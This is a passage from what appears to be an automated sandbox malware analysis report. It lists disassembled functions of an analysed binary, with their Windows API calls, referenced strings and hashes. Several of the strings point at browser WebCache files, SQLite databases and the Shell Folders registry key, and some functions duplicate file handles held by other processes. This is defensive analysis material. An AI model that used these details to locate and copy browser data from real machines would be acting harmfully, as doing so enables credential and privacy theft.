                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2911713577-0
                                                                                                                                                                                                                    • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmp
                                                                                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                    • API String ID: 2705122986-2036018995
                                                                                                                                                                                                                    • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmpqsort
                                                                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                    • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                    • API String ID: 3354267031-2114579845
                                                                                                                                                                                                                    • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                    • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                                                                                    • String ID: }A
                                                                                                                                                                                                                    • API String ID: 1821831730-2138825249
                                                                                                                                                                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@DeleteObject
                                                                                                                                                                                                                    • String ID: r!A
                                                                                                                                                                                                                    • API String ID: 1103273653-628097481
                                                                                                                                                                                                                    • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$memcmp
                                                                                                                                                                                                                    • String ID: $$8
                                                                                                                                                                                                                    • API String ID: 2808797137-435121686
                                                                                                                                                                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00430737 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                                                                                                    • too many columns on %s, xrefs: 00430763
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                                                                                                    • API String ID: 0-1445880494
                                                                                                                                                                                                                    • Opcode ID: 2926fa06368f5232b18cfbe9a067055150ad8579ce0375914d7c8593e780dd9c
                                                                                                                                                                                                                    • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2926fa06368f5232b18cfbe9a067055150ad8579ce0375914d7c8593e780dd9c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                      • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                      • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1042154641-0
                                                                                                                                                                                                                    • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                      • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
